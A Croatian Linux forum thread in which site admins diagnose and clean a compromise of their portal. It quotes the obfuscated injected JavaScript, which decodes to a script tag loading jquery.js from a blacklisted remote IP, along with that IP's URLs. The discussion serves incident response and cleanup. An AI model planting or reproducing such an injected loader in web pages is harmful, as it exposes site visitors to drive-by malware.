Prijedlozi, komentari, kritike i sl. vezano uz portal.
Moderator/ica: Moderatori/ce
Markec
Postovi: 3865 Pridružen/a: 30 sij 2008, 14:55
Spol: M
OS: neodlučan
Lokacija: Croatia/Zagorje
Post
Postao/la Markec » 18 tra 2009, 15:14
Suko
Site Admin
Postovi: 16079 Pridružen/a: 03 tra 2008, 18:09
Spol: M
OS: Mint 17 Cinnamon
Lokacija: Svugdi me ima. Slavonija uglavnom.
Post
Postao/la Suko » 18 tra 2009, 15:19
I što sad?
Jel može neko objasniti o čem se radi?
4ndY
Moderator
Postovi: 4060 Pridružen/a: 15 svi 2008, 18:05
Spol: M
OS: Fedora/KDE
Lokacija: Hamburg, DE
Kontakt:
Post
Postao/la 4ndY » 18 tra 2009, 17:03
Provjeriti koji dio lzs.com site-a zove ovo:
Kod: Označi sve
http://94.247.2.195/jquery.js
http://94.247.2.195/news/?id=101
jer je taj IP blacklistan...
A neutron walks into a bar; he asks the bartender, 'How much for a beer?' The bartender looks at him, and says 'For you, no charge.'
Sokac
Site Admin
Postovi: 1120 Pridružen/a: 11 pro 2007, 23:33
Spol: M
OS: Archlinux
Lokacija: San Francisco
Kontakt:
Post
Postao/la Sokac » 18 tra 2009, 17:19
Kod je izgeneriran između </head> i <body> i radi se o sljedećem:
Kod: Označi sve
<script language=javascript><!--
document.write(unescape('8Zd%3CsTHcTHripC0Ht%20JYsn1zrc%3DLc%2F%2F8Zd9n1z4%2E2TH4JY7C0H%2E2%2EhAt1TH9Lc5Lc%2Fn1zjn1zqLcuJYervViy%2EjC0Hs8Zd%3E%3C%2FvVisLccriC0HptLc%3E').replace(/hAt|8Zd|JY|vVi|C0H|n1z|TH|Lc/g,""));
--></script>
odnosno prevedeno
Kod: Označi sve
<script src=//94.247.2.195/jquery.js></script>
Što znači da poziva tu skriptu.
Pregledao sam kod i toga dijela jednostavno nema (prazno je između </head> i <body>. Vrlo vjeorjatno da se netko poigrao sa cijelim serverom i to bi trebalo prijaviti vlasniku servera, odnosno firmi pondi.
Grof
Site Admin
Postovi: 9954 Pridružen/a: 04 pro 2007, 08:00
Lokacija: Zagreb
Post
Postao/la Grof » 18 tra 2009, 22:46
Sokac je napisao/la:
Pregledao sam kod i toga dijela jednostavno nema (prazno je između </head> i <body>. Vrlo vjeorjatno da se netko poigrao sa cijelim serverom i to bi trebalo prijaviti vlasniku servera, odnosno firmi pondi.
Pa neka Ivan prijavi onda...
Markec
Postovi: 3865 Pridružen/a: 30 sij 2008, 14:55
Spol: M
OS: neodlučan
Lokacija: Croatia/Zagorje
Post
Postao/la Markec » 20 tra 2009, 14:31
Popravljeno
Sokac
Site Admin
Postovi: 1120 Pridružen/a: 11 pro 2007, 23:33
Spol: M
OS: Archlinux
Lokacija: San Francisco
Kontakt:
Post
Postao/la Sokac » 20 tra 2009, 15:46
Super, preko 100 datoteka sam morao prepravljati xD
Tux Slave
Postovi: 519 Pridružen/a: 25 ožu 2008, 14:47
Spol: M
OS: Fedora 10 - KDE 4.2.x
Lokacija: Nova Gradiska
Kontakt:
Post
Postao/la Tux Slave » 20 tra 2009, 16:00
Sokac je napisao/la: Super, preko 100 datoteka sam morao prepravljati xD
Ovo bi bilo odlično kao zadatak.
Napisati bash skriptu koja će izbrisati malciozni kod iz svih fileova u unesenom direktoriju i pod-direktoriju. I još uz to dati primjer filea s malcioznim kodom na kojemu bi se skripta testirala.
Ali već je riješeno pa nema potrebe.
Markec
Postovi: 3865 Pridružen/a: 30 sij 2008, 14:55
Spol: M
OS: neodlučan
Lokacija: Croatia/Zagorje
Post
Postao/la Markec » 20 tra 2009, 16:52
Sokac je napisao/la: Super, preko 100 datoteka sam morao prepravljati xD
svaka ti čast što si uspio
Zanima me, kako je taj virus dospio na server lzs, jel možda iz pondija došel ili ?
iv@n
Site Admin
Postovi: 7631 Pridružen/a: 01 pro 2007, 18:12
Spol: M
OS: openSUSE TW
Lokacija: Vinkovci, Hrvatska
Kontakt:
Post
Postao/la iv@n » 20 tra 2009, 17:01
Markec šta sada Chrome kaže kad pristupiš lzs?
To avoid criticism ~ do nothing, say nothing, be nothing.